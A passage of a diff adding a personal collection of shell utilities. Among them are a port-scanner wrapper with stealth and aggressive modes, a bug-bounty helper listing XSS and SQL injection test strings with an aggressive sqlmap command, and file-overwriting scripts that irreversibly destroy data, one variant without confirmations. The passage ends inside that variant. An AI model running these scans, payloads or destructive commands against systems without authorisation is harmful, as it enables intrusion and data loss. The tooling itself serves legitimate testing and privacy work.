    elif [[ "$line" =~ CLOSE_WAIT ]]; then
        echo -e "$line" | sed "s/CLOSE_WAIT/${RED}CLOSE_WAIT${NC}/"
    else
        echo "$line"
    fi
done

# Summary
echo
echo -e "${BOLD}${CYAN}Summary:${NC}"
total=$(echo "$output" | wc -l)
echo " Total connections: $((total - 1))"

if [[ "$show_listen_only" == "true" ]]; then
    echo -e " ${GREEN}Tip:${NC} Use 'ports -a' to see all connections"
fi

if [[ "$show_process" == "false" ]]; then
    echo -e " ${GREEN}Tip:${NC} Use 'ports -p' to see process information"
fi
|
||||
10
scripts/prettypath
Executable file
10
scripts/prettypath
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: prettypath
# Description: Display $PATH with one directory per line
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: prettypath

# tr swaps every ':' separator for a newline — same output as the
# original embedded-newline sed, without the awkward line break.
printf '%s\n' "$PATH" | tr ':' '\n'
|
||||
250
scripts/pscan
Executable file
250
scripts/pscan
Executable file
|
|
@ -0,0 +1,250 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: pscan
# Description: Unified port scanner wrapper (nmap/masscan/rustscan)
# Usage: pscan <target> # Quick scan with best available tool
# pscan <target> -f # Full port scan (all 65535)
# pscan <target> -u # UDP scan
# pscan <target> -v # Version detection
# pscan <target> -s # Stealth scan

VERSION="1.0.0"

# ANSI colors shared by the output helpers below.
readonly RED='\033[0;31m'
readonly GREEN='\033[0;32m'
readonly YELLOW='\033[1;33m'
readonly BLUE='\033[0;34m'
readonly CYAN='\033[0;36m'
readonly MAGENTA='\033[0;35m'
readonly BOLD='\033[1m'
readonly NC='\033[0m'

# Usage screen. printf %b interprets the embedded ANSI escapes,
# producing the same bytes as the original echo -e calls.
show_help() {
    printf '%b\n' "${BOLD}pscan${NC} - Unified Port Scanner Wrapper v${VERSION}"
    printf '\n'
    printf '%b\n' "${BOLD}USAGE:${NC}"
    printf '%s\n' " pscan <target> [OPTIONS]"
    printf '\n'
    printf '%b\n' "${BOLD}OPTIONS:${NC}"
    printf '%b\n' " ${CYAN}-f, --full${NC} Scan all 65535 ports"
    printf '%b\n' " ${CYAN}-t, --top${NC} Scan top 1000 ports (default)"
    printf '%b\n' " ${CYAN}-q, --quick${NC} Quick scan (top 100 ports)"
    printf '%b\n' " ${CYAN}-u, --udp${NC} UDP scan"
    printf '%b\n' " ${CYAN}-v, --version${NC} Version detection"
    printf '%b\n' " ${CYAN}-s, --stealth${NC} Stealth SYN scan"
    printf '%b\n' " ${CYAN}-a, --aggressive${NC} Aggressive scan (OS, version, scripts, traceroute)"
    printf '%b\n' " ${CYAN}-o, --output FILE${NC} Save output to file"
    printf '%b\n' " ${CYAN}-h, --help${NC} Show this help"
    printf '\n'
    printf '%b\n' "${BOLD}TOOL PREFERENCE:${NC}"
    printf '%s\n' " 1. rustscan (fastest, if available)"
    printf '%s\n' " 2. masscan (fast, if available)"
    printf '%s\n' " 3. nmap (fallback, always available)"
    printf '\n'
    printf '%b\n' "${BOLD}EXAMPLES:${NC}"
    printf '%s\n' " pscan 192.168.1.1 # Quick scan"
    printf '%s\n' " pscan 192.168.1.0/24 # Scan subnet"
    printf '%s\n' " pscan 10.10.10.5 -f # Full port scan"
    printf '%s\n' " pscan target.com -v # Version detection"
    printf '%s\n' " pscan 10.0.0.1 -s # Stealth scan"
    printf '%s\n' " pscan 192.168.1.1 -o scan.txt # Save output"
    printf '\n'
    printf '%b\n' "${BOLD}INSTALLED TOOLS:${NC}"
    command -v rustscan &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} rustscan" || printf '%b\n' " ${RED}✗${NC} rustscan (install: cargo install rustscan)"
    command -v masscan &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} masscan" || printf '%b\n' " ${RED}✗${NC} masscan (install: sudo apt install masscan)"
    command -v nmap &>/dev/null && printf '%b\n' " ${GREEN}✓${NC} nmap" || printf '%b\n' " ${RED}✗${NC} nmap (install: sudo apt install nmap)"
}
|
||||
|
||||
# Detect best scanner
|
||||
get_scanner() {
    # Emit the name of the fastest available scanner, walking the same
    # preference order as before: rustscan > masscan > nmap.
    local candidate
    for candidate in rustscan masscan nmap; do
        if command -v "$candidate" &>/dev/null; then
            echo "$candidate"
            return 0
        fi
    done
    echo -e "${RED}Error:${NC} No port scanner found" >&2
    echo "Install one: sudo apt install nmap masscan" >&2
    exit 1
}
|
||||
|
||||
# Rustscan wrapper
|
||||
scan_rustscan() {
    # Args: target host, port range (default: everything), extra args
    # appended verbatim to the rustscan invocation.
    local host="$1"
    local port_range="${2:-1-65535}"
    local extra="${3:-}"

    printf '%b\n' "${CYAN}[*]${NC} Using rustscan for ${BOLD}${host}${NC}"
    printf '%b\n' "${CYAN}[*]${NC} Ports: ${port_range}"
    printf '\n'

    # shellcheck disable=SC2086 -- $extra is intentionally word-split
    rustscan -a "$host" -r "$port_range" --ulimit 5000 $extra
}
|
||||
|
||||
# Masscan wrapper
|
||||
scan_masscan() {
    # Args: target, port spec, packet rate, optional extra arguments.
    # The 4th parameter is new (backward compatible): it is appended
    # verbatim to the masscan invocation, e.g. "-oL scan.txt", so callers
    # can forward an output file instead of losing it.
    local target="$1"
    local ports="${2:-0-65535}"
    local rate="${3:-1000}"
    local extra="${4:-}"

    echo -e "${CYAN}[*]${NC} Using masscan for ${BOLD}$target${NC}"
    echo -e "${CYAN}[*]${NC} Ports: $ports | Rate: $rate pps"
    echo

    # shellcheck disable=SC2086 -- $extra is intentionally word-split
    sudo masscan "$target" -p"$ports" --rate="$rate" --open $extra
}
|
||||
|
||||
# Nmap wrapper
|
||||
scan_nmap() {
    # Args: target, scan-type flag, port spec, extra args.
    # The port spec and extra args may contain multiple words
    # (e.g. "--top-ports 1000"), so they are deliberately unquoted below.
    local target="$1"
    local scan_type="${2:--sS}"
    local ports="${3:--p-}"
    local extra_args="${4:-}"

    echo -e "${CYAN}[*]${NC} Using nmap for ${BOLD}$target${NC}"
    echo -e "${CYAN}[*]${NC} Scan type: $scan_type | Ports: $ports"
    echo

    # FIX: $ports was previously quoted, which handed nmap the single
    # (invalid) argument "--top-ports 1000" and broke top/quick modes.
    # shellcheck disable=SC2086
    sudo nmap "$scan_type" $ports $extra_args "$target"
}
|
||||
|
||||
# Parse arguments
|
||||
# ---- argument parsing -------------------------------------------------
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
    show_help
    exit 0
fi

target="$1"
shift

# Default settings
mode="top"
scan_type="tcp"
output_file=""
scanner=$(get_scanner)
aggressive=false
version_detect=false
stealth=false

# Parse options
while [[ $# -gt 0 ]]; do
    case $1 in
        -f|--full)
            mode="full"
            shift
            ;;
        -t|--top)
            mode="top"
            shift
            ;;
        -q|--quick)
            mode="quick"
            shift
            ;;
        -u|--udp)
            scan_type="udp"
            shift
            ;;
        -v|--version)
            version_detect=true
            shift
            ;;
        -s|--stealth)
            stealth=true
            shift
            ;;
        -a|--aggressive)
            aggressive=true
            shift
            ;;
        -o|--output)
            output_file="$2"
            shift 2
            ;;
        *)
            echo -e "${RED}Error:${NC} Unknown option: $1"
            exit 1
            ;;
    esac
done

# ---- dispatch to the selected backend ---------------------------------
case "$scanner" in
    rustscan)
        case "$mode" in
            full)  ports="1-65535" ;;
            top)   ports="1-10000" ;;
            quick) ports="1-1000" ;;
        esac

        extra_args=""
        if [[ -n "$output_file" ]]; then
            extra_args="$extra_args -o $output_file"
        fi

        scan_rustscan "$target" "$ports" "$extra_args"
        ;;

    masscan)
        case "$mode" in
            full)  ports="0-65535"; rate="10000" ;;
            top)   ports="1-10000"; rate="5000" ;;
            quick) ports="1-1000";  rate="1000" ;;
        esac

        # FIX: the old code appended "-oL $output_file" to an *uninitialized*
        # extra_args (an unbound-variable crash under `set -u`) and then never
        # passed it to scan_masscan anyway. Warn instead of silently losing it.
        if [[ -n "$output_file" ]]; then
            echo -e "${YELLOW}[!]${NC} -o is not forwarded to the masscan backend; redirect stdout instead" >&2
        fi

        scan_masscan "$target" "$ports" "$rate"
        ;;

    nmap)
        # Choose the scan flag: stealth and the TCP default are both SYN scans.
        if [[ "$stealth" == "true" ]]; then
            nmap_scan="-sS"
        elif [[ "$scan_type" == "udp" ]]; then
            nmap_scan="-sU"
        else
            nmap_scan="-sS"
        fi

        case "$mode" in
            full)  nmap_ports="-p-" ;;
            top)   nmap_ports="--top-ports 1000" ;;
            quick) nmap_ports="--top-ports 100" ;;
        esac

        nmap_extra=""
        if [[ "$version_detect" == "true" ]]; then
            nmap_extra="$nmap_extra -sV"
        fi
        if [[ "$aggressive" == "true" ]]; then
            nmap_extra="$nmap_extra -A"
        fi
        if [[ -n "$output_file" ]]; then
            nmap_extra="$nmap_extra -oN $output_file"
        fi

        scan_nmap "$target" "$nmap_scan" "$nmap_ports" "$nmap_extra"
        ;;
esac

echo
echo -e "${GREEN}[✓]${NC} Scan complete"
# FIX: this used to be a bare `[[ -n … ]] && echo` as the script's last
# command, which made pscan exit with status 1 whenever -o was not given.
if [[ -n "$output_file" ]]; then
    echo -e "${GREEN}[✓]${NC} Output saved to: $output_file"
fi
|
||||
74
scripts/quick-vuln-test.sh
Executable file
74
scripts/quick-vuln-test.sh
Executable file
|
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env bash
# Quick vulnerability testing helper
# Usage: quick-vuln-test.sh <url> <type>
# Types: xss, sqli, idor, csrf

set -euo pipefail

URL="${1:-}"
TYPE="${2:-}"

# Both arguments are mandatory.
if [[ -z "$URL" || -z "$TYPE" ]]; then
    echo "Usage: $0 <url> <type>"
    echo "Types: xss, sqli, idor, csrf"
    exit 1
fi

# Each branch prints a cheat-sheet; heredocs replace the echo cascades.
case "$TYPE" in
    xss)
        cat <<'EOF'
[+] Testing for XSS...
[+] Basic payload: <script>alert(1)</script>
[+] Image payload: <img src=x onerror=alert(1)>
[+] SVG payload: <svg onload=alert(1)>

[!] Test these in Burp Suite or manually
[!] Document which ones work in your findings
EOF
        ;;

    sqli)
        # Unquoted delimiter so $URL expands in the sqlmap hint.
        cat <<EOF
[+] Testing for SQL Injection...
[+] Basic test: '
[+] Boolean test: ' OR '1'='1
[+] UNION test: ' UNION SELECT NULL--
[+] Time-based: ' AND SLEEP(5)--

[!] Use sqlmap for automated testing:
sqlmap -u '$URL' --batch --risk=3 --level=5
EOF
        ;;

    idor)
        cat <<'EOF'
[+] Testing for IDOR...
[+] 1. Create two test accounts
[+] 2. Log in as User A, identify resource ID
[+] 3. Log in as User B, try to access User A's resource
[+] 4. Check if authorization is enforced

[!] Use Burp Suite to intercept and modify requests
[!] Look for IDs in: URL params, POST body, JSON, cookies
EOF
        ;;

    csrf)
        cat <<'EOF'
[+] Testing for CSRF...
[+] 1. Find state-changing action (password change, email update)
[+] 2. Intercept request in Burp Suite
[+] 3. Check for CSRF token in request
[+] 4. Remove token and replay - does it still work?
[+] 5. Check SameSite cookie attribute

[!] If no CSRF protection, create PoC HTML page
EOF
        ;;

    *)
        echo "[-] Unknown vulnerability type: $TYPE"
        echo "Types: xss, sqli, idor, csrf"
        exit 1
        ;;
esac

cat <<'EOF'

[+] When you find a vulnerability:
 1. Take screenshots (Flameshot)
 2. Document PoC steps
 3. Copy template: cp ~/.claude/context/business/security/bug-bounty/templates/<type>.json ~/bug-bounty/discoveries/
 4. Fill in [BRACKETED] fields
 5. Generate report: bun run ~/.claude/context/business/security/bug-bounty/latex/generate.ts
EOF
|
||||
111
scripts/radio
Executable file
111
scripts/radio
Executable file
|
|
@ -0,0 +1,111 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: radio
# Description: Internet radio station wrapper with curated stations
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: radio <station-name>
# radio list

# FIX: the original exited immediately when mpv was missing, which made
# its own VLC fallback further down unreachable. Accept either player.
if ! command -v mpv &>/dev/null && ! command -v vlc &>/dev/null; then
    echo "Error: Neither mpv nor VLC is installed" >&2
    echo "Install one with: sudo apt install mpv" >&2
    exit 1
fi

# Curated radio stations: name -> "stream_url|description"
declare -A stations=(
    # Rock & Metal
    ["metal"]="http://listen.181fm.com/181-greatoldies_128k.mp3|Heavy Metal & Hard Rock"
    ["rock"]="http://listen.181fm.com/181-rock_128k.mp3|Classic Rock"

    # Cyberpunk / Synthwave / Darkwave
    ["cyberpunk"]="https://stream.nightride.fm/nightride.mp3|Nightride FM - Synthwave/Retrowave/Outrun"
    ["darksynth"]="https://stream.nightride.fm/darksynth.mp3|Darksynth/Cyberpunk/Synthmetal"
    ["chillsynth"]="https://stream.nightride.fm/chillsynth.mp3|Chillsynth/Chillwave/Instrumental"
    ["datawave"]="https://stream.nightride.fm/datawave.mp3|Glitchy Synthwave/IDM"
    ["spacesynth"]="https://stream.nightride.fm/spacesynth.mp3|Spacesynth/Space Disco"
    ["horrorsynth"]="https://stream.nightride.fm/horrorsynth.mp3|Horrorsynth/Witch House"
    ["industrial"]="https://stream.nightride.fm/ebsm.mp3|Industrial/EBM/Midtempo"

    # Electronic / Techno
    ["techno"]="http://stream.laut.fm/technobase|Techno Base - Coding Beats"
    ["dnb"]="https://stream.nightride.fm/rektfm.mp3|Drum & Bass/Dubstep/Techno/Trance"
    ["lofi"]="https://stream.nightride.fm/chillsynth.mp3|Lo-Fi Chill Beats"

    # Meditation / Ambient / Relaxation
    ["meditation"]="https://streaming.radionomy.com/-zenoflm-|Zen FM - Meditation & Relaxation"
    ["ambient"]="https://somafm.com/dronezone130.pls|SomaFM Drone Zone - Ambient"
    ["sleep"]="https://somafm.com/deepspaceone130.pls|SomaFM Deep Space One"
    ["nature"]="https://streaming.radionomy.com/NatureSoundsRelaxation|Nature Sounds"

    # Classical
    ["classical"]="https://stream.live.vc.bbcmedia.co.uk/bbc_radio_three|BBC Radio 3 - Classical"
    ["piano"]="http://stream.laut.fm/piano-classics|Piano Classics"
)

# List available stations
if [[ $# -eq 0 ]] || [[ "$1" == "list" ]]; then
    echo "📻 Available Radio Stations:"
    echo ""
    echo "🤘 ROCK & METAL:"
    echo " radio metal - Heavy Metal & Hard Rock"
    echo " radio rock - Classic Rock"
    echo ""
    echo "🌃 CYBERPUNK / SYNTHWAVE:"
    echo " radio cyberpunk - Nightride FM (Synthwave/Retrowave)"
    echo " radio darksynth - Darksynth/Cyberpunk/Synthmetal"
    echo " radio chillsynth - Chillsynth/Chillwave"
    echo " radio datawave - Glitchy Synthwave/IDM"
    echo " radio spacesynth - Spacesynth/Space Disco"
    echo " radio horrorsynth- Horrorsynth/Witch House"
    echo " radio industrial - Industrial/EBM"
    echo ""
    echo "🎧 ELECTRONIC / TECHNO:"
    echo " radio techno - Techno Base (Coding Beats)"
    echo " radio dnb - Drum & Bass/Dubstep/Trance"
    echo " radio lofi - Lo-Fi Chill Beats"
    echo ""
    echo "🧘 MEDITATION / AMBIENT:"
    echo " radio meditation - Zen FM"
    echo " radio ambient - SomaFM Drone Zone"
    echo " radio sleep - Deep Space Ambient"
    echo " radio nature - Nature Sounds"
    echo ""
    echo "🎹 CLASSICAL:"
    echo " radio classical - BBC Radio 3"
    echo " radio piano - Piano Classics"
    echo ""
    exit 0
fi

station="$1"

# Check if station exists
if [[ -z "${stations[$station]:-}" ]]; then
    echo "Error: Station '$station' not found" >&2
    echo "Run 'radio list' to see available stations" >&2
    exit 1
fi

# Parse station URL and description
IFS='|' read -r url description <<< "${stations[$station]}"

echo "📻 Tuning in to: $description"
echo "🔊 Playing... (Ctrl+C to stop)"
echo ""

# Prefer mpv; fall back to VLC (the fallback is now actually reachable).
if command -v mpv &>/dev/null; then
    # mpv returns non-zero on user interruption (Ctrl+C), which is normal
    mpv --no-video --volume=50 "$url"
else
    echo "mpv not found. Trying VLC..." >&2
    vlc "$url" 2>/dev/null
fi
|
||||
53
scripts/randomize-mac
Executable file
53
scripts/randomize-mac
Executable file
|
|
@ -0,0 +1,53 @@
|
|||
#!/bin/bash
# randomize-mac - Randomize MAC addresses for privacy
# Usage: sudo randomize-mac

set -euo pipefail

ETHERNET="enp3s0"
WIFI="wlp4s0"

# Print the current MAC address of an interface.
current_mac() {
    ip link show "$1" | grep ether | awk '{print $2}'
}

# Randomize one interface, reporting before/after addresses.
# $1 = pretty label, $2 = interface name, $3 = failure message.
randomize_iface() {
    local label="$1" iface="$2" fail_msg="$3"

    echo "$label ($iface):"
    if ip link show "$iface" &>/dev/null; then
        echo " └─ Before: $(current_mac "$iface")"
        if macchanger -r "$iface" 2>/dev/null; then
            echo " └─ After: $(current_mac "$iface")"
            echo " └─ ✅ Randomized successfully"
        else
            echo " └─ ⚠️ $fail_msg"
        fi
    else
        echo " └─ ⚠️ Interface not found"
    fi
}

# Check if running as root
if [ "$EUID" -ne 0 ]; then
    echo "❌ This script must be run as root (use sudo)"
    exit 1
fi

echo "🔄 Randomizing MAC addresses..."
echo ""

randomize_iface "📡 Ethernet" "$ETHERNET" "Failed (interface may be in use)"
echo ""
randomize_iface "📶 WiFi" "$WIFI" "Failed (interface may be disabled or in use)"

echo ""
echo "⚠️ NOTE: You may need to reconnect to your network after randomization!"
echo ""
echo "💡 TIP: WiFi ($WIFI) is currently disabled. This script will randomize it"
echo " when you enable WiFi, preventing tracking on public networks."
|
||||
14
scripts/receive-file.bat
Normal file
14
scripts/receive-file.bat
Normal file
|
|
@ -0,0 +1,14 @@
|
|||
@echo off
rem receive-file.bat - client-side helper: downloads a file shared via croc.
rem Requires croc.exe alongside this script (or on PATH).
echo ════════════════════════════════════════
echo FILE RECEIVER - Djedi Consulting
echo ════════════════════════════════════════
echo.
rem Ask the client for the one-time transfer code provided out of band.
set /p CODE="Enter the code I gave you: "
echo.
echo Downloading file...
croc.exe %CODE%
echo.
echo ════════════════════════════════════════
echo File downloaded to Downloads folder!
echo Press any key to close...
pause
|
||||
18
scripts/rfv
Executable file
18
scripts/rfv
Executable file
|
|
@ -0,0 +1,18 @@
|
|||
#!/usr/bin/env bash

# rfv - interactive ripgrep + fzf search.
# CTRL-R: re-run ripgrep with the current query (ripgrep mode).
# CTRL-F: freeze the ripgrep results and fuzzy-filter them (fzf mode).
# ENTER:  open the selected file at the matched line in helix.

# Per-mode query stashes; start each run from a clean slate.
rm -f /tmp/rg-fzf-{r,f}

rg_cmd="rg --column --line-number --no-heading --color=always --smart-case "
initial_query="${*:-}"

fzf --ansi --disabled --query "$initial_query" \
    --bind "start:reload($rg_cmd {q})+unbind(ctrl-r)" \
    --bind "change:reload:sleep 0.1; $rg_cmd {q} || true" \
    --bind "ctrl-f:unbind(change,ctrl-f)+change-prompt(2. fzf> )+enable-search+rebind(ctrl-r)+transform-query(echo {q} > /tmp/rg-fzf-r; cat /tmp/rg-fzf-f)" \
    --bind "ctrl-r:unbind(ctrl-r)+change-prompt(1. ripgrep> )+disable-search+reload($rg_cmd {q} || true)+rebind(change,ctrl-f)+transform-query(echo {q} > /tmp/rg-fzf-f; cat /tmp/rg-fzf-r)" \
    --color "hl:-1:underline,hl+:-1:underline:reverse" \
    --prompt '1. ripgrep> ' \
    --delimiter : \
    --header '╱ CTRL-R (ripgrep mode) ╱ CTRL-F (fzf mode) ╱' \
    --preview 'bat --color=always {1} --highlight-line {2}' \
    --preview-window 'up,60%,border-bottom,+{2}+3/3,~3' \
    --bind 'enter:become(hx {1} +{2})'
|
||||
11
scripts/rn
Executable file
11
scripts/rn
Executable file
|
|
@ -0,0 +1,11 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: rn
# Description: Display current time, date, and calendar
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: rn

# Clock plus long-form date.
date "+%l:%M%p on %A, %B %e, %Y"
printf '\n'
# Month calendar with today's (space-padded %e) day highlighted;
# the "|$" alternative keeps every non-matching line in the output.
cal | grep -E --color=always "\b$(date '+%e')\b|$"
|
||||
7
scripts/rsync-vps-backup.sh
Executable file
7
scripts/rsync-vps-backup.sh
Executable file
|
|
@ -0,0 +1,7 @@
|
|||
#!/bin/bash
# rsync-vps-backup.sh - Pull the weekly n8n backup archive from the VPS.
#
# cron
# 0 3 * * 1 /home/youruser/scripts/rsync-n8n-backup.sh

# FIX: fail loudly on transfer errors instead of silently succeeding.
set -euo pipefail

readonly SRC="yourvpsuser@yourvpsip:/home/yourvpsuser/n8n-compose/n8n-data-backup.tar.gz"
readonly DEST="/home/youruser/backups/n8n/"

# Ensure the destination exists so a fresh machine doesn't fail the copy.
mkdir -p "$DEST"

rsync -avz "$SRC" "$DEST"
|
||||
|
||||
20
scripts/running
Executable file
20
scripts/running
Executable file
|
|
@ -0,0 +1,20 @@
|
|||
#!/usr/bin/env bash
set -euo pipefail

# Script Name: running
# Description: Better process search with PID highlighting
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
# Usage: running
# running firefox
# running python

# Snapshot of every process: PID plus full command line.
procs="$(ps -eo 'pid command')"

# Narrow to the search term, if one was supplied
# (case-insensitive, fixed-string, whole-word match).
if [[ $# != 0 ]]; then
    procs="$(echo "$procs" | grep -Fiw "$@")"
fi

# Drop this script and the grep above from the listing, then
# highlight the leading PID column in magenta.
echo "$procs" \
    | grep -Fv "${BASH_SOURCE[0]}" \
    | grep -Fv grep \
    | GREP_COLORS='mt=00;35' grep -E --colour=auto '^\s*[[:digit:]]+'
|
||||
247
scripts/secure-overwrite-files
Executable file
247
scripts/secure-overwrite-files
Executable file
|
|
@ -0,0 +1,247 @@
|
|||
#!/bin/bash
# secure-overwrite-files - Securely overwrite files with encrypted random data
# ⚠️ WARNING: THIS PERMANENTLY DESTROYS DATA - USE WITH EXTREME CAUTION
#
# Overwrites every non-hidden regular file directly inside TARGET_DIR with
# gpg-encrypted /dev/urandom output of at least the same size, after three
# separate confirmations. Filenames are preserved; contents are destroyed.
#
# Usage:
#   secure-overwrite-files --dry-run /path/to/files    # See what would happen
#   secure-overwrite-files /path/to/files              # Actually overwrite

set -euo pipefail

# Detect WSL and set compatibility flags
# (checked via /proc/version or the WSL_DISTRO_NAME env var; only used
# to annotate the warning banner below)
IS_WSL=false
if grep -qiE '(microsoft|wsl)' /proc/version 2>/dev/null || [ -n "${WSL_DISTRO_NAME:-}" ]; then
    IS_WSL=true
fi

# Colors for warnings
RED='\033[0;31m'
YELLOW='\033[1;33m'
GREEN='\033[0;32m'
NC='\033[0m' # No Color

# Configuration
DRY_RUN=false
TARGET_DIR=""

# Parse arguments
# Note: any non-flag argument becomes TARGET_DIR; the last one wins.
while [[ $# -gt 0 ]]; do
    case $1 in
        --dry-run)
            DRY_RUN=true
            shift
            ;;
        --help|-h)
            cat <<EOF
Secure File Overwriting Tool

Usage:
  $0 --dry-run /path/to/files    # Preview what would happen
  $0 /path/to/files              # Actually overwrite files

⚠️ WARNING: This PERMANENTLY DESTROYS data by overwriting with encrypted random noise.
This is IRREVERSIBLE. Ensure you have backups before proceeding.

Safety Features:
- Requires explicit directory path (won't work in current directory by accident)
- Multiple confirmation prompts
- Dry-run mode to preview actions
- Skips system directories and hidden files
- Shows file list before proceeding

Use Cases:
- Overwriting sensitive files in cloud storage before deletion
- Securely erasing data from external drives
- Preparing media for disposal

EOF
            exit 0
            ;;
        *)
            TARGET_DIR="$1"
            shift
            ;;
    esac
done

# Validate target directory
if [ -z "$TARGET_DIR" ]; then
    echo -e "${RED}❌ ERROR: No target directory specified${NC}"
    echo "Usage: $0 [--dry-run] /path/to/files"
    echo "Run with --help for more information"
    exit 1
fi

if [ ! -d "$TARGET_DIR" ]; then
    echo -e "${RED}❌ ERROR: Directory does not exist: $TARGET_DIR${NC}"
    exit 1
fi

# Convert to absolute path
# (also normalizes symlinked/relative paths before the blacklist check)
TARGET_DIR=$(cd "$TARGET_DIR" && pwd)

# Safety check: Don't allow certain dangerous paths
# Note: this is an exact-match blacklist; subdirectories of these paths
# are still allowed.
DANGEROUS_PATHS=(
    "/"
    "/home"
    "/etc"
    "/usr"
    "/var"
    "/bin"
    "/sbin"
    "/boot"
    "$HOME"
    "$HOME/.ssh"
    "$HOME/.gnupg"
)

for dangerous in "${DANGEROUS_PATHS[@]}"; do
    if [ "$TARGET_DIR" = "$dangerous" ]; then
        echo -e "${RED}❌ DANGER: Refusing to operate on system directory: $TARGET_DIR${NC}"
        echo "This would destroy your system!"
        exit 1
    fi
done

# Get list of files (skip hidden files and directories)
# Using portable array building that works on WSL, Linux, and any bash 3.2+
# -print0/read -d '' keeps filenames with spaces/newlines intact.
FILES=()
while IFS= read -r -d '' file; do
    FILES+=("$file")
done < <(find "$TARGET_DIR" -maxdepth 1 -type f ! -name ".*" -print0)

if [ ${#FILES[@]} -eq 0 ]; then
    echo -e "${YELLOW}⚠️ No files found in: $TARGET_DIR${NC}"
    exit 0
fi

# Display warnings and file list
echo ""
echo -e "${RED}╔════════════════════════════════════════════════════════════╗${NC}"
echo -e "${RED}║ ⚠️ SECURE FILE OVERWRITE - IRREVERSIBLE DATA DESTRUCTION ║${NC}"
echo -e "${RED}╚════════════════════════════════════════════════════════════╝${NC}"
echo ""
echo -e "${YELLOW}Target Directory:${NC} $TARGET_DIR"
echo -e "${YELLOW}Files to overwrite:${NC} ${#FILES[@]}"
if [ "$IS_WSL" = true ]; then
    echo -e "${YELLOW}Environment:${NC} WSL (Windows Subsystem for Linux)"
fi
echo ""
echo "The following files will be PERMANENTLY DESTROYED:"
echo ""

for file in "${FILES[@]}"; do
    filename=$(basename "$file")
    filesize=$(du -h "$file" | cut -f1)
    echo " 📄 $filename ($filesize)"
done

echo ""

if [ "$DRY_RUN" = true ]; then
    echo -e "${GREEN}🔍 DRY RUN MODE - No files will be modified${NC}"
    echo ""
    echo "What would happen:"
    echo " 1. Each file above would be overwritten with encrypted random data"
    echo " 2. Original content would be permanently destroyed"
    echo " 3. Files would remain with same names but contain only encrypted noise"
    echo ""
    echo "To actually perform this operation, run:"
    echo " $0 $TARGET_DIR"
    echo ""
    exit 0
fi

# First confirmation
# NOTE(review): read without -r interprets backslashes in the reply;
# harmless for the literal "YES" check but read -r is the safer habit.
echo -e "${RED}⚠️ THIS WILL PERMANENTLY DESTROY ${#FILES[@]} FILES!${NC}"
echo ""
read -p "Are you ABSOLUTELY SURE you want to continue? Type 'YES' in all caps: " confirm1

if [ "$confirm1" != "YES" ]; then
    echo -e "${GREEN}✅ Aborted. No files were modified.${NC}"
    exit 0
fi

# Second confirmation with directory name
echo ""
echo -e "${RED}⚠️ FINAL CONFIRMATION${NC}"
echo "You are about to overwrite all files in:"
echo " $TARGET_DIR"
echo ""
read -p "Type the full directory path to confirm: " confirm2

if [ "$confirm2" != "$TARGET_DIR" ]; then
    echo -e "${GREEN}✅ Aborted. Path did not match. No files were modified.${NC}"
    exit 0
fi

# Third confirmation - countdown
echo ""
echo -e "${RED}Beginning file destruction in:${NC}"
for i in 5 4 3 2 1; do
    echo " $i..."
    sleep 1
done
echo ""

# Perform the overwriting
echo -e "${YELLOW}🔄 Overwriting files with encrypted random data...${NC}"
echo ""

SUCCESS_COUNT=0
FAIL_COUNT=0

for file in "${FILES[@]}"; do
    filename=$(basename "$file")
    filesize=$(stat -c%s "$file")

    # Determine size in MB (minimum 1MB)
    # Integer division rounds down, so +1 guarantees the replacement is
    # at least as large as the original.
    size_mb=$(( (filesize / 1048576) + 1 ))
    if [ $size_mb -lt 1 ]; then
        size_mb=1
    fi

    printf " 📄 %s ... " "$filename"

    # Flush output immediately
    sync 2>/dev/null || true

    # Create encrypted random data with same name
    # urandom -> gpg with a throwaway random passphrase, so the result
    # is indistinguishable from ordinary encrypted content.
    if dd if=/dev/urandom bs=1M count=$size_mb 2>/dev/null | \
        gpg --symmetric --cipher-algo AES256 --batch \
        --passphrase "$(openssl rand -base64 32)" > "${file}.tmp" 2>/dev/null; then

        # Verify temp file was created
        if [ ! -f "${file}.tmp" ]; then
            printf "${RED}✗ Failed (temp file not created)${NC}\n"
            ((FAIL_COUNT++)) || true
            continue
        fi

        # Replace original with encrypted noise (both variables fully quoted)
        # NOTE(review): mv swaps in a NEW inode rather than overwriting the
        # original blocks in place; on journaling filesystems/SSDs the old
        # data may survive on disk — TODO confirm this matches the threat
        # model (cloud-storage overwrite before delete, per --help).
        if mv "${file}.tmp" "${file}"; then
            printf "${GREEN}✓ Destroyed${NC}\n"
            ((SUCCESS_COUNT++)) || true
        else
            printf "${RED}✗ Failed (mv error: $?)${NC}\n"
            ((FAIL_COUNT++)) || true
            rm -f "${file}.tmp" 2>/dev/null || true
        fi
    else
        printf "${RED}✗ Failed (encryption error)${NC}\n"
        ((FAIL_COUNT++)) || true
        rm -f "${file}.tmp" 2>/dev/null || true
    fi
done

echo ""
echo "═══════════════════════════════════════"
echo -e "${GREEN}✅ Complete${NC}"
echo " Successfully destroyed: $SUCCESS_COUNT files"
if [ $FAIL_COUNT -gt 0 ]; then
    echo -e " ${RED}Failed: $FAIL_COUNT files${NC}"
fi
echo ""
echo "⚠️ Original data is now PERMANENTLY UNRECOVERABLE"
echo "You can now delete these files from cloud storage."
echo ""
|
||||
72
scripts/secure-overwrite-files-debug
Executable file
72
scripts/secure-overwrite-files-debug
Executable file
|
|
@ -0,0 +1,72 @@
|
|||
#!/bin/bash
# DEBUG VERSION - Shows exactly what commands are being run
# Usage: secure-overwrite-files-debug /path/to/directory
#
# ⚠️ Unlike the main secure-overwrite-files script, this variant has NO
# confirmations, blacklist, or dry-run mode: it immediately destroys
# every non-hidden regular file in the target directory. Troubleshooting
# use only.

set -euo pipefail
set -x # Print every command before executing

# NOTE(review): with no argument, "$1" aborts under set -u with a terse
# bash error; a usage message would be friendlier.
TARGET_DIR="$1"

